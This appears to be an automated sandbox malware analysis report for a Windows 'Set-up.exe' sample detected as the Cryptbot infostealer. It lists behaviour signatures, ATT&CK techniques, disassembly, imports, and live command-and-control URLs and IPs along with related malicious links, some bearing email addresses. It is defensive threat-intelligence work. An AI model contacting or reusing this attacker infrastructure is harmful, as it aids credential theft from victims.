    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001129FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_001129FF
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001114E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001114E0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0011116C Sleep,Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,_cexit,_initterm,exit,0_2_0011116C
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00111160 Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,0_2_00111160
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001111A3 Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,0_2_001111A3
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001113C9 SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,_initterm,0_2_001113C9
    Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002F93D0 GetSystemTime,SystemTimeToFileTime,0_2_002F93D0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00631870 GetVersion,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,GetLastError,__acrt_iob_func,_time32,GetLastError,__acrt_iob_func,0_2_00631870
    Source: C:\Users\user\Desktop\Set-up.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: Set-up.exe, Set-up.exe, 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
    Source: Set-up.exe, Set-up.exe, 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

    Stealing of Sensitive Information

    barindex
    Yara detected Cryptbot
    Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 6512, type: MEMORYSTR
    Infostealer behavior detected
    Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
    Leaks process information
    Source: global trafficTCP traffic: 192.168.2.4:49731 -> 34.147.147.173:80

    Remote Access Functionality

    barindex
    Yara detected Cryptbot
    Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 6512, type: MEMORYSTR
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0014A550 setsockopt,_errno,_errno,_errno,_errno,setsockopt,WSAGetLastError,getsockopt,setsockopt,strlen,htons,getsockopt,setsockopt,WSAGetLastError,WSAGetLastError,strchr,htons,bind,WSAGetLastError,htons,bind,WSAGetLastError,htons,strtoul,0_2_0014A550
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001DAA30 htons,htons,socket,ioctlsocket,setsockopt,setsockopt,htonl,bind,setsockopt,setsockopt,connect,WSAGetLastError,closesocket,0_2_001DAA30
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0015E480 strlen,strchr,strchr,strchr,strtoul,strchr,strtoul,memcpy,getsockname,WSAGetLastError,WSAGetLastError,memcpy,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,bind,htons,bind,WSAGetLastError,getsockname,listen,listen,WSAGetLastError,htons,0_2_0015E480

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
    Command and Scripting Interpreter    		1
    DLL Side-Loading    		1
    DLL Side-Loading    		1
    Virtualization/Sandbox Evasion    		OS Credential Dumping1
    System Time Discovery    		Remote Services11
    Archive Collected Data    		21
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    Native API    		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Deobfuscate/Decode Files or Information    		LSASS Memory231
    Security Software Discovery    		Remote Desktop Protocol1
    Data from Local System    		4
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
    Obfuscated Files or Information    		Security Account Manager1
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared Drive4
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    DLL Side-Loading    		NTDS12
    Process Discovery    		Distributed Component Object ModelInput Capture15
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
    Remote System Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials2
    File and Directory Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync17
    System Information Discovery    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Set-up.exe33%VirustotalBrowse
    Set-up.exe29%ReversingLabsWin32.Infostealer.Tinba

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi670%Avira URL Cloudsafe
    http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767http://home.thirttj13vs.top/gbVspuhpvozlyd0%Avira URL Cloudsafe
    http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767?argument=0S0%Avira URL Cloudsafe
    http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi17361387670%Avira URL Cloudsafe
    http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi17361387675a10%Avira URL Cloudsafe
    http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767?argu0%Avira URL Cloudsafe
    thirttj13vs.top0%Avira URL Cloudsafe
    home.thirttj13vs.top0%Avira URL Cloudsafe
    http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767?argument=00%Avira URL Cloudsafe
    http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi17361387679630%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    home.thirttj13vs.top
    		34.147.147.173
    		truefalse
      		high
      httpbin.org
      		50.19.58.113
      		truefalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767true
        • Avira URL Cloud: safe
        		unknown
        thirttj13vs.toptrue
        • Avira URL Cloud: safe
        		unknown
        home.thirttj13vs.toptrue
        • Avira URL Cloud: safe
        		unknown
        https://httpbin.org/ipfalse
          		high
          http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767?argument=0true
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.htmlSet-up.exefalse
            		high
            http://html4/loose.dtdSet-up.exefalse
              		high
              https://curl.se/docs/alt-svc.html#Set-up.exefalse
                		high
                https://httpbin.org/ipbeforeSet-up.exefalse
                  		high
                  https://curl.se/docs/http-cookies.htmlSet-up.exefalse
                    		high
                    https://curl.se/docs/hsts.html#Set-up.exefalse
                      		high
                      http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi17361387675a1Set-up.exe, 00000000.00000003.1766598511.0000000001593000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766768289.0000000001597000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766658323.0000000001596000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1768202774.000000000159B000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi67Set-up.exefalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767http://home.thirttj13vs.top/gbVspuhpvozlydSet-up.exe, 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767?argument=0SSet-up.exe, 00000000.00000002.1768172601.0000000001591000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766598511.000000000158D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766788259.0000000001591000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766966328.0000000001591000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://curl.se/docs/alt-svc.htmlSet-up.exefalse
                        		high
                        http://.cssSet-up.exefalse
                          		high
                          http://.jpgSet-up.exefalse
                            		high
                            http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767?arguSet-up.exe, 00000000.00000002.1768202774.000000000159B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767963Set-up.exe, 00000000.00000003.1766598511.0000000001593000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766768289.0000000001597000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766658323.0000000001596000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1768202774.000000000159B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            34.147.147.173
                            		home.thirttj13vs.topUnited States
                            		2686ATGS-MMD-ASUSfalse
                            50.19.58.113
                            		httpbin.orgUnited States
                            		14618AMAZON-AESUSfalse

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1584736
                            Start date and time:2025-01-06 12:14:07 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 43s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:2
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:Set-up.exe
                            Detection:MAL
                            Classification:mal84.troj.spyw.evad.winEXE@1/0@9/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 78%
                            • Number of executed functions: 51
                            • Number of non-executed functions: 147
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated

                            Warnings

                            • Exclude process from analysis (whitelisted): SIHClient.exe
                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            34.147.147.173Set-up.exeGet hashmaliciousCryptbotBrowse
                            • home.thirttj13vs.top/KQOoGKPKGzBeuSFZKvBJ1736042467
                            ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                            • home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
                            random(5).exeGet hashmaliciousCryptbotBrowse
                            • home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
                            Set-up.exeGet hashmaliciousUnknownBrowse
                            • home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435
                            Set-up.exeGet hashmaliciousUnknownBrowse
                            • home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435
                            TX5LAYBZRI.exeGet hashmaliciousUnknownBrowse
                            • home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
                            XJiB3BdLTg.exeGet hashmaliciousUnknownBrowse
                            • home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
                            Bo6uO5gKL4.exeGet hashmaliciousUnknownBrowse
                            • home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
                            50.19.58.113Set-up.exeGet hashmaliciousCryptbotBrowse

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              httpbin.orgSet-up.exeGet hashmaliciousCryptbotBrowse
                              • 50.19.58.113
                              ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                              • 34.197.122.172
                              random(3).exeGet hashmaliciousCryptbotBrowse
                              • 34.200.57.114
                              random(5).exeGet hashmaliciousCryptbotBrowse
                              • 34.200.57.114
                              Set-up.exeGet hashmaliciousUnknownBrowse
                              • 34.200.57.114
                              Set-up.exeGet hashmaliciousUnknownBrowse
                              • 34.200.57.114
                              TX5LAYBZRI.exeGet hashmaliciousUnknownBrowse
                              • 34.200.57.114
                              Prs9eAnu2k.exeGet hashmaliciousUnknownBrowse
                              • 34.197.122.172
                              joE9s9sbv0.exeGet hashmaliciousUnknownBrowse
                              • 34.200.57.114
                              XJiB3BdLTg.exeGet hashmaliciousUnknownBrowse
                              • 34.197.122.172
                              home.thirttj13vs.topSet-up.exeGet hashmaliciousCryptbotBrowse
                              • 34.147.147.173

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              AMAZON-AESUShttps://czfc104.na1.hubspotlinks.com/Ctc/RI+113/cZFc104/VVpBhY3Y-LTWW3Cvl9B8hKRPtVVm64t5qdmRWN1f4_WP7mt9FW50l5tj6lZ3lNW8SvDYK4v65T-W5VNxKh8dLcmKW1GlXcL834zD3W5w7v_71CDbKVV4Dsjr5FnQ2PVSHlbR3pc5MwW72kzKm6WrbY7W6NJh0_7GRxDMW2K2WDT2ZPr4xW3b_gtn2bnp5xW7Hn0F58SN9mqN4_D9_QrtgD8VBy-hV2j1qrbW3N54fh8gXkqCW6JcyP11p5DmRW6d2nj72MkQXgW6hgqJx7Gc_ycW5DT-Pm451FQhW4Tph0s8GNtc-W58sq8G9dpW27W5S3wzf7rNLv_Vn6h606T2B8YN4yb6VRDg_G5W36Gvt_2lnk9qW2LykX37R4KRSW1F2tHT3jrLyjW7hSkG572MN4TW75KrBz5T-zFkVLJYW27hKs9nW3h3Pmh907wxLW2Zzdnn98hQC7W2Qnk7D31ZBJjW83tNvQ2nNht5W1HJvHm95P722W55gfDx9lT1vDW1ykGr_219m_RW5ff63S7MhCcQW4_QfK_5TQdprVlF4dm2DH-ctW6mF-BW36YwwNW99r61n6mmMhVW2v1J7Q5mVXz2W53lcRT6L4fsVN8gyZcXY0MfLW2kLwLd1TYk1wW7MzDQt4QNh6nW1bMMpS84VG-SW6F_Tym5bK06Qf6rQzB604Get hashmaliciousUnknownBrowse
                              • 44.199.56.69
                              https://www.scribd.com/document/787929982/script-tlsfranceGet hashmaliciousUnknownBrowse
                              • 54.88.142.103
                              2.elfGet hashmaliciousUnknownBrowse
                              • 54.54.35.81
                              https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.comGet hashmaliciousUnknownBrowse
                              • 44.217.167.231
                              https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rmgfuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                              • 34.237.47.184
                              https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=olgelfuabFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                              • 3.233.162.86
                              Set-up.exeGet hashmaliciousCryptbotBrowse
                              • 50.19.58.113
                              Fantazy.spc.elfGet hashmaliciousUnknownBrowse
                              • 54.60.167.108
                              Fantazy.m68k.elfGet hashmaliciousUnknownBrowse
                              • 54.140.246.99
                              momo.mips.elfGet hashmaliciousMiraiBrowse
                              • 18.214.158.12
                              ATGS-MMD-ASUShttps://www.scribd.com/document/787929982/script-tlsfranceGet hashmaliciousUnknownBrowse
                              • 34.8.123.242
                              4.elfGet hashmaliciousUnknownBrowse
                              • 48.205.169.154
                              Set-up.exeGet hashmaliciousCryptbotBrowse
                              • 34.147.147.173
                              cZO.exeGet hashmaliciousUnknownBrowse
                              • 57.128.196.4
                              Fantazy.spc.elfGet hashmaliciousUnknownBrowse
                              • 32.108.110.16
                              Fantazy.x86.elfGet hashmaliciousUnknownBrowse
                              • 32.167.24.91
                              Fantazy.m68k.elfGet hashmaliciousUnknownBrowse
                              • 48.232.188.207
                              Fantazy.i686.elfGet hashmaliciousUnknownBrowse
                              • 51.2.229.158
                              Fantazy.arm7.elfGet hashmaliciousMiraiBrowse
                              • 48.42.126.167
                              momo.mpsl.elfGet hashmaliciousMiraiBrowse
                              • 57.229.27.66

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              No created / dropped files found

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                              Entropy (8bit):6.142440388231851
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.53%
                              • InstallShield setup (43055/19) 0.43%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:Set-up.exe
                              File size:7'745'160 bytes
                              MD5:82f12257874f42d2f2475ca1d9189e43
                              SHA1:24e0e7493e9bcc17d4858f350c6a6694f4a5acc5
                              SHA256:b75aaedf296ec3b596c58573077667f403ed73b18ec052ed9b68b21414671a72
                              SHA512:4398246584471c2158002b20c396c9ec4b9a842d2eb39acb1f4685ffc2644b54217bc1732f0d6b2cbbb6e7ef59ab823140f8b4f2c73b4874edd6d30274fc7e8d
                              SSDEEP:49152:wDQO2+6/4+mlIgcM/klYv3icaIBsgPkJGSlfMjluWwKWghT5yj+xK4buwPyz8Dlq:wDyG+mcM8kycpBLPSGGMjfdK+yz8E
                              TLSH:36762762EE8741F9DAC305715156B37F7E30AF009829CEB6DE90FB34D672A11E91E218
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a{g...............(..R..$v..2............R...@...........................v.....X.v...@... ............................

                              File Icon

                              Icon Hash:90cececece8e8eb0

                              Static PE Info

                              General

                              Entrypoint:0x4014a0
                              Entrypoint Section:.text
                              Digitally signed:true
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                              Time Stamp:0x677B61F3 [Mon Jan 6 04:54:11 2025 UTC]
                              TLS Callbacks:0x7890e0, 0x789090
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:51b39aff649af7abc30a06f2362db069

                              Authenticode Signature

                              Signature Valid:false
                              Signature Issuer:CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US
                              Signature Validation Error:A certificate chain could not be built to a trusted root authority
                              Error Number:-2146762486
                              Not Before, Not After
                              • 26/08/2024 17:01:06 21/08/2025 17:01:06
                              Subject Chain
                              • CN=www.microsoft.com, O=Microsoft Corporation, L=Redmond, S=WA, C=US
                              Version:3
                              Thumbprint MD5:3396EFFCA7AAE6A8A1361318EB7496FF
                              Thumbprint SHA-1:955613CC5723CCAB945D4A2F7F7C15D457ECDC54
                              Thumbprint SHA-256:F4E34A654907F496BEBC17BE075B41F51E416CDF202D64AA1E93D993C6487263
                              Serial:33009F7B734DB0480411EB0BBA0000009F7B73

                              Entrypoint Preview

                              Instruction
                              mov dword ptr [00B2E658h], 00000001h
                              jmp 00007F755C7FB276h
                              nop
                              mov dword ptr [00B2E658h], 00000000h
                              jmp 00007F755C7FB266h
                              nop
                              sub esp, 1Ch
                              mov eax, dword ptr [esp+20h]
                              mov dword ptr [esp], eax
                              call 00007F755CB82AD6h
                              cmp eax, 01h
                              sbb eax, eax
                              add esp, 1Ch
                              ret
                              nop
                              nop
                              nop
                              nop
                              nop
                              nop
                              nop
                              nop
                              push ebp
                              mov ebp, esp
                              push edi
                              push esi
                              push ebx
                              sub esp, 1Ch
                              mov dword ptr [esp], 009D5000h
                              call dword ptr [00B309A8h]
                              sub esp, 04h
                              test eax, eax
                              je 00007F755C7FB635h
                              mov ebx, eax
                              mov dword ptr [esp], 009D5000h
                              call dword ptr [00B30A1Ch]
                              mov edi, dword ptr [00B309BCh]
                              sub esp, 04h
                              mov dword ptr [00B2C028h], eax
                              mov dword ptr [esp+04h], 009D5013h
                              mov dword ptr [esp], ebx
                              call edi
                              sub esp, 08h
                              mov esi, eax
                              mov dword ptr [esp+04h], 009D5029h
                              mov dword ptr [esp], ebx
                              call edi
                              sub esp, 08h
                              mov dword ptr [0092C004h], eax
                              test esi, esi
                              je 00007F755C7FB5D3h
                              mov dword ptr [esp+04h], 00B2C02Ch
                              mov dword ptr [esp], 00B27104h
                              call esi
                              mov dword ptr [esp], 00401580h
                              call 00007F755C7FB523h
                              lea esp, dword ptr [ebp-0Ch]
                              pop ebx
                              pop esi

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x7300000x2dac.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x7628000x688.reloc
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x7350000x34f84.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x71cca00x18.rdata
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x7308140x620.idata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x52a6ac0x52a800baa43239fc496f1e552593148c585739unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .data0x52c0000xa8ee40xa9000e5144cd5a13323c364349ac7e504a291False0.03480665218195266dBase III DBT, version number 0, next free block index 10, 1st item "\200Hz"0.49021551938145835IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rdata0x5d50000x151ad80x151c00f72a467ea1d31a64b8b74faf1c3a80e9False0.42061074551258326data6.278649157996116IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .eh_fram0x7270000x4d640x4e00fedb9fd76b96a9860b646db0ac84ea18False0.3199619391025641data4.889705613516218IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .bss0x72c0000x31800x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata0x7300000x2dac0x2e00f3bdd02b09559dde47d9f0bcb1c12fecFalse0.3687160326086957data5.347168347257807IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .CRT0x7330000x300x200fe2a65d4187b984679c52ae93485940eFalse0.0625data0.2233456448570176IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .tls0x7340000x80x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .reloc0x7350000x34f840x35000ad3f2ccef971e35e4bf2169f7b4eb7f1False0.5023723098466981data6.661444090813991IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Imports

                              DLLImport
                              ADVAPI32.dllCryptAcquireContextA, CryptAcquireContextW, CryptCreateHash, CryptDecrypt, CryptDestroyHash, CryptDestroyKey, CryptEnumProvidersW, CryptExportKey, CryptGenRandom, CryptGetHashParam, CryptGetProvParam, CryptGetUserKey, CryptHashData, CryptReleaseContext, CryptSetHashParam, CryptSignHashW, DeregisterEventSource, RegCloseKey, RegEnumKeyExA, RegNotifyChangeKeyValue, RegOpenKeyExA, RegOpenKeyExW, RegQueryValueExA, RegisterEventSourceW, ReportEventW, SystemFunction036
                              bcrypt.dllBCryptGenRandom
                              CRYPT32.dllCertCloseStore, CertDuplicateCertificateContext, CertEnumCertificatesInStore, CertFindCertificateInStore, CertFreeCertificateContext, CertGetCertificateContextProperty, CertGetEnhancedKeyUsage, CertGetIntendedKeyUsage, CertOpenStore, CertOpenSystemStoreA, CertOpenSystemStoreW
                              GDI32.dllBitBlt, CreateCompatibleBitmap, CreateCompatibleDC, DeleteDC, DeleteObject, GetDeviceCaps, SelectObject
                              gdiplus.dllGdipGetImageEncoders, GdipGetImageEncodersSize, GdiplusShutdown, GdiplusStartup
